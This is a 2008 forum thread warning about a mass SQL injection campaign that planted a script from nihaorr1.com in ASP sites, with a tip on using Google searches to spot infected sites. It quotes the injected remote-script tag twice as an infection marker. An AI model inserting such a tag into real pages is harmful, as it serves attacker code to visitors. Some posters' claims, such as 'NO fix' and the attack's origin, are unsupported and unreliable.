Virus Threat

Granada · 22-04-08

We've just had our forums wiped out by this virus, www. nihaorr1.com/1.js.

After checking in Google, it wipes out .asp databases, and returns several times.

Spread the word quickly

trevHCS · 26-04-08

Looks like a nice one attacking ASP / MSSQL stuff. Added more into the web hosting section.

nihaorr1.com ASP virus

Trev

John Jupp · 26-04-08

I can't find the link now. It's a SQL injection attack using vulnerabilities in Windows IIS for which there is NO fix. Most of the current attacks are eminating from Russia.

John Jupp · 26-04-08

Irony is if you do a google search for nihaorr1 then all the infected websites are listed (122,000+ entries) as their SQL injection is picked up and displayed by Google in the header. Many seem to be travel websites, obviously to get payment details on reservations.

John Jupp · 26-04-08

nihaorr1 - Google Search

Notice the <script src=http://www.nihaorr1.com/1.js></script> in the header of each website. Hacked.

John Jupp · 26-04-08

To check if YOUR site has been listed (with the infection) and subject obviously to Google having visited type in google search:

nihaorr1 your site name as displayed in the header

An example being: nihaorr1 funway holidays - Google Search

Then if you see the <script src=http://www.nihaorr1.com/1.js></script> command in the header you are a victim.

tbp · 26-04-08

Very interesting post about this below, which explains how it works and what it does:

Anyone know about www.nihaorr1.com/1.js? - IIS.net